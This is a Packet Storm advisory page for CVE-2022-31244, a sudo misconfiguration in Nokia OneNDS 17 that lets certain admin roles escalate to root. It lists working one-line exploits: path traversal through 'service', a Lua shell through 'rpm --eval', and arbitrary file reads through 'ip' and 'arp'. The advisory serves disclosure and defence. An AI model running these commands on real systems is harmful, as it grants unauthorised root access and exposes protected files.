Lucene search
Valerio Casalino, Savino Sisco, Milena Mangiola, Giacomo SighinolfiPACKETSTORM:171970HistoryApr 21, 2023 - 12:00 a.m.
Nokia OneNDS 17 Insecure Permissions / Privilege Escalation
2023-04-2100:00:00
Valerio Casalino, Savino Sisco, Milena Mangiola, Giacomo Sighinolfi
packetstormsecurity.com
236
nokia onends 17
insecure permissions
privilege escalation
security misconfiguration
high severity
cve-2022-31244
sudo exploitation
0.0004 Low
EPSS
Percentile
9.1%
`===============================================================================
title: Incorrect Permission Assignment
product: Nokia OneNDS 17
vulnerability type: Security Misconfiguration
severity: High
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
found on: 31/03/2022
by: Giacomo Sighinolfi, Milena Mangiola,
Savino Sisco, Valerio Casalino
cve: CVE-2022-31244
===============================================================================
Some sudo permissions can be exploited by the users that have specific roles
to escalate to root privileges and execute arbitrary commands on the system.
The affected roles are:
ONENDS_CC_BASIC_ADMIN:
- it can run /sbin/service
- can be exploited using `sudo /sbin/service ../../bin/sh`
ONENDS_CC_SERVICE_ADMIN:
- it can run /bin/rpm
- can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`
ONENDS_CC_NETWORK_MANAGEMENT:
- it can run /sbin/ip,/sbin/arp
- can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`
- can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`
===============================================================================
`
Related
cve
cve
CVE-2022-31244
2023-04-25 16:15:08
prion
prion
Privilege escalation
2023-04-25 16:15:00
cvelist
cvelist
CVE-2022-31244
2023-04-25 00:00:00
nvd
nvd
CVE-2022-31244
2023-04-25 16:15:08
zdt
zdt
Nokia OneNDS 17 Insecure Permissions / Privilege Escalation Vulnerability
2023-04-24 00:00:00